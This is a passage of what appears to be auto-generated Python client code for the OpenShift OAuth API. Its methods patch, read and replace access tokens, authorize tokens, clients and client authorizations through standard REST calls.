        :param str name: name of the OAuthAuthorizeToken (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthAuthorizeToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.patch_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
        else:
            (data) = self.patch_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
            return data

    def patch_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, name, body, **kwargs):
        """
        partially update the specified OAuthAuthorizeToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAuthorizeToken (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthAuthorizeToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch_oauth_openshift_io_v1_o_auth_authorize_token" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `patch_oauth_openshift_io_v1_o_auth_authorize_token`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `patch_oauth_openshift_io_v1_o_auth_authorize_token`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'PATCH',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthAuthorizeToken',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def patch_oauth_openshift_io_v1_o_auth_client(self, name, body, **kwargs):
        """
        partially update the specified OAuthClient
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_oauth_openshift_io_v1_o_auth_client(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClient (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthClient
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.patch_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
        else:
            (data) = self.patch_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
            return data

    def patch_oauth_openshift_io_v1_o_auth_client_with_http_info(self, name, body, **kwargs):
        """
        partially update the specified OAuthClient
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClient (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthClient
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch_oauth_openshift_io_v1_o_auth_client" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `patch_oauth_openshift_io_v1_o_auth_client`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `patch_oauth_openshift_io_v1_o_auth_client`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthclients/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'PATCH',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthClient',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def patch_oauth_openshift_io_v1_o_auth_client_authorization(self, name, body, **kwargs):
        """
        partially update the specified OAuthClientAuthorization
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_oauth_openshift_io_v1_o_auth_client_authorization(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClientAuthorization (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthClientAuthorization
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.patch_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
        else:
            (data) = self.patch_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
            return data

    def patch_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, name, body, **kwargs):
        """
        partially update the specified OAuthClientAuthorization
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClientAuthorization (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthClientAuthorization
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch_oauth_openshift_io_v1_o_auth_client_authorization" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `patch_oauth_openshift_io_v1_o_auth_client_authorization`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `patch_oauth_openshift_io_v1_o_auth_client_authorization`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'PATCH',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthClientAuthorization',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def read_oauth_openshift_io_v1_o_auth_access_token(self, name, **kwargs):
        """
        read the specified OAuthAccessToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.read_oauth_openshift_io_v1_o_auth_access_token(name, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAccessToken (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user can not specify.
        :return: V1OAuthAccessToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.read_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, **kwargs)
        else:
            (data) = self.read_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, **kwargs)
            return data

    def read_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, name, **kwargs):
        """
        read the specified OAuthAccessToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.read_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAccessToken (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user can not specify.
        :return: V1OAuthAccessToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'pretty', 'exact', 'export']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method read_oauth_openshift_io_v1_o_auth_access_token" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `read_oauth_openshift_io_v1_o_auth_access_token`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'exact' in params:
            query_params['exact'] = params['exact']
        if 'export' in params:
            query_params['export'] = params['export']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthAccessToken',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
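
    # Usage sketch (assumption: `api` is an instance of this class; the token
    # name 'mytoken' is hypothetical). Reads are plain GETs; passing
    # _preload_content=False returns the raw HTTP response object instead of a
    # deserialized V1OAuthAccessToken model:
    #
    #     token = api.read_oauth_openshift_io_v1_o_auth_access_token('mytoken')
    #     raw = api.read_oauth_openshift_io_v1_o_auth_access_token(
    #         'mytoken', _preload_content=False)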

    def read_oauth_openshift_io_v1_o_auth_authorize_token(self, name, **kwargs):
        """
        read the specified OAuthAuthorizeToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.read_oauth_openshift_io_v1_o_auth_authorize_token(name, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAuthorizeToken (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user can not specify.
        :return: V1OAuthAuthorizeToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.read_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, **kwargs)
        else:
            (data) = self.read_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, **kwargs)
            return data

    def read_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, name, **kwargs):
        """
        read the specified OAuthAuthorizeToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.read_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAuthorizeToken (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user can not specify.
        :return: V1OAuthAuthorizeToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'pretty', 'exact', 'export']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method read_oauth_openshift_io_v1_o_auth_authorize_token" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `read_oauth_openshift_io_v1_o_auth_authorize_token`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'exact' in params:
            query_params['exact'] = params['exact']
        if 'export' in params:
            query_params['export'] = params['export']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthAuthorizeToken',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def read_oauth_openshift_io_v1_o_auth_client(self, name, **kwargs):
        """
        read the specified OAuthClient
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.read_oauth_openshift_io_v1_o_auth_client(name, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClient (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user can not specify.
        :return: V1OAuthClient
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.read_oauth_openshift_io_v1_o_auth_client_with_http_info(name, **kwargs)
        else:
            (data) = self.read_oauth_openshift_io_v1_o_auth_client_with_http_info(name, **kwargs)
            return data

    def read_oauth_openshift_io_v1_o_auth_client_with_http_info(self, name, **kwargs):
        """
        read the specified OAuthClient
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.read_oauth_openshift_io_v1_o_auth_client_with_http_info(name, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClient (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user can not specify.
        :return: V1OAuthClient
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'pretty', 'exact', 'export']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method read_oauth_openshift_io_v1_o_auth_client" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `read_oauth_openshift_io_v1_o_auth_client`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthclients/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'exact' in params:
            query_params['exact'] = params['exact']
        if 'export' in params:
            query_params['export'] = params['export']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthClient',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def read_oauth_openshift_io_v1_o_auth_client_authorization(self, name, **kwargs):
        """
        read the specified OAuthClientAuthorization
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.read_oauth_openshift_io_v1_o_auth_client_authorization(name, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClientAuthorization (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user can not specify.
        :return: V1OAuthClientAuthorization
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.read_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, **kwargs)
        else:
            (data) = self.read_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, **kwargs)
            return data

    def read_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, name, **kwargs):
        """
        read the specified OAuthClientAuthorization
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.read_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClientAuthorization (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user can not specify.
        :return: V1OAuthClientAuthorization
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'pretty', 'exact', 'export']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method read_oauth_openshift_io_v1_o_auth_client_authorization" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `read_oauth_openshift_io_v1_o_auth_client_authorization`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'exact' in params:
            query_params['exact'] = params['exact']
        if 'export' in params:
            query_params['export'] = params['export']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthClientAuthorization',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def replace_oauth_openshift_io_v1_o_auth_access_token(self, name, body, **kwargs):
        """
        replace the specified OAuthAccessToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.replace_oauth_openshift_io_v1_o_auth_access_token(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAccessToken (required)
        :param V1OAuthAccessToken body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthAccessToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.replace_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
        else:
            (data) = self.replace_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
            return data

    def replace_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, name, body, **kwargs):
        """
        replace the specified OAuthAccessToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.replace_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAccessToken (required)
        :param V1OAuthAccessToken body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthAccessToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method replace_oauth_openshift_io_v1_o_auth_access_token" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `replace_oauth_openshift_io_v1_o_auth_access_token`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `replace_oauth_openshift_io_v1_o_auth_access_token`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'PUT',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthAccessToken',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def replace_oauth_openshift_io_v1_o_auth_authorize_token(self, name, body, **kwargs):
        """
        replace the specified OAuthAuthorizeToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.replace_oauth_openshift_io_v1_o_auth_authorize_token(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAuthorizeToken (required)
        :param V1OAuthAuthorizeToken body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthAuthorizeToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.replace_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
        else:
            (data) = self.replace_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
            return data

    def replace_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, name, body, **kwargs):
        """
        replace the specified OAuthAuthorizeToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.replace_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAuthorizeToken (required)
        :param V1OAuthAuthorizeToken body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthAuthorizeToken
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
